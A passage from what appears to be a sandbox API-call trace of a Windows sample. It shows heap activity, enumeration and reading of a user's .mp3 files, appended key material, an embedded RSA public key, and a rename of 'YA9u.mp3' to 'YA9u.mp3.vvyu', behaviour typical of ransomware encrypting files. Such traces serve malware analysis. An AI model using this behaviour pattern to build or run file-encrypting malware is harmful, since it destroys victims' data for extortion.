RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0188.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0188.706] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0188.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af1f88 [0188.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9d0 | out: hHeap=0x2c0000) returned 1 [0188.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9e8 | out: hHeap=0x2c0000) returned 1 [0188.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da30 | out: hHeap=0x2c0000) returned 1 [0188.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0188.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0188.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da30 [0188.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0188.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d9e8 [0188.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0188.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2a0d9d0 [0188.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0188.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0188.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0188.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0188.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0188.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0188.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0188.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0188.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9e8 | out: hHeap=0x2c0000) returned 1 [0188.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0188.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9d0 | out: hHeap=0x2c0000) returned 1 [0188.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0188.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0188.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da30 | out: hHeap=0x2c0000) returned 1 [0188.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0188.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f90 | out: hHeap=0x2c0000) returned 1 [0188.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0188.711] GetCurrentThreadId () returned 0x5d8 [0188.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0188.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ee890 [0188.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0188.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0188.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0188.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0188.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0188.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0188.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.712] GetCurrentThreadId () returned 0x5d8 [0188.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0188.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0188.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0188.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0188.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0188.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0188.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0188.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da30 [0188.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0188.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0188.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0188.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0188.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0188.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0188.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0188.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0188.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d9d0 [0188.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0188.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0188.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0188.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0188.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0188.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0188.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0188.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d9e8 [0188.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0188.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0188.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0188.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d9b8 [0188.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0188.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0da48 [0188.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0188.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0188.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0188.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da18 [0188.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0188.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da00 [0188.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0188.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0da60 [0188.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da00 | out: hHeap=0x2c0000) returned 1 [0188.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0da00 [0188.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da18 | out: hHeap=0x2c0000) returned 1 [0188.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0188.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0188.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0188.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0188.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0188.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9d0 | out: hHeap=0x2c0000) returned 1 [0188.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d9d0 [0188.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0188.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af1f88 [0188.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da30 | out: hHeap=0x2c0000) returned 1 [0188.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0188.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da60 | out: hHeap=0x2c0000) returned 1 [0188.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af2198 [0188.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0188.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0188.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0188.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0188.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9d0 | out: hHeap=0x2c0000) returned 1 [0188.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af23b0 [0188.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0188.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0188.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0188.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0188.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0188.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0188.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0188.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0188.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af2198 | out: hHeap=0x2c0000) returned 1 [0188.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af23b0 | out: hHeap=0x2c0000) returned 1 [0188.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0188.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da00 | out: hHeap=0x2c0000) returned 1 [0188.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0188.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da48 | out: hHeap=0x2c0000) returned 1 [0188.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0188.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9e8 | out: hHeap=0x2c0000) returned 1 [0188.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9b8 | out: hHeap=0x2c0000) returned 1 [0188.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0188.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0188.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0188.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9a0 | out: hHeap=0x2c0000) returned 1 [0188.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2890 | out: hHeap=0x2c0000) returned 1 [0188.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0188.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0188.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0188.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0188.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0188.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0188.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0188.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0188.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0188.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0188.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0188.723] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0xd9a0, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0xd9a0, lpOverlapped=0x0) returned 1 [0188.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0188.724] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xd9a5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.724] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0188.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0188.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eba0 [0188.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af1f88 [0188.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af1f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0188.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af23b8 [0188.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0188.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eba0 | out: hHeap=0x2c0000) returned 1 [0188.725] WriteFile (in: hFile=0x584, lpBuffer=0x2af23b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af23b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0188.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af23b8 | out: hHeap=0x2c0000) returned 1 [0188.726] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0188.726] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0188.726] CloseHandle (hObject=0x584) returned 1 [0188.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0188.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x2af1f88 [0188.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0188.728] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\YA9u.mp3" (normalized: "c:\\users\\keecfmwgj\\desktop\\ya9u.mp3"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\YA9u.mp3.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\ya9u.mp3.vvyu")) returned 1 [0188.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0188.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.729] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0188.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0188.731] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4bcfb30, ftCreationTime.dwHighDateTime=0x1d8995c, ftLastAccessTime.dwLowDateTime=0xece51490, ftLastAccessTime.dwHighDateTime=0x1d8a365, ftLastWriteTime.dwLowDateTime=0xece51490, ftLastWriteTime.dwHighDateTime=0x1d8a365, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YnPBSI277", cAlternateFileName="YNPBSI~1")) returned 1 [0188.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0188.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40580 [0188.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0188.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a404d0 [0188.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40108 [0188.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a401b8 [0188.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0188.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0188.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40160 | out: hHeap=0x2c0000) returned 1 [0188.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0188.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40160 [0188.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40580 | out: hHeap=0x2c0000) returned 1 [0188.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0188.751] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55093470, ftCreationTime.dwHighDateTime=0x1d89911, ftLastAccessTime.dwLowDateTime=0x17b3c5e0, ftLastAccessTime.dwHighDateTime=0x1d8a0d7, ftLastWriteTime.dwLowDateTime=0x17b3c5e0, ftLastWriteTime.dwHighDateTime=0x1d8a0d7, nFileSizeHigh=0x0, nFileSizeLow=0x16045, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="z8twGmunEhQoxqFe1k.mp3", cAlternateFileName="Z8TWGM~1.MP3")) returned 1 [0188.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2890 [0188.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbbc0 [0188.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2890 | out: hHeap=0x2c0000) returned 1 [0188.751] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\z8twGmunEhQoxqFe1k.mp3") returned=".mp3" [0188.751] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\z8twGmunEhQoxqFe1k.mp3" (normalized: "c:\\users\\keecfmwgj\\desktop\\z8twgmunehqoxqfe1k.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0188.752] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=90181) returned 1 [0188.752] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0188.756] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x1601f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.756] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0188.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0188.766] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.766] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0188.766] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x16045, lpOverlapped=0x0) returned 1 [0188.767] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.767] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0188.768] lstrlenA (lpString="-----BEGIN PUBLIC 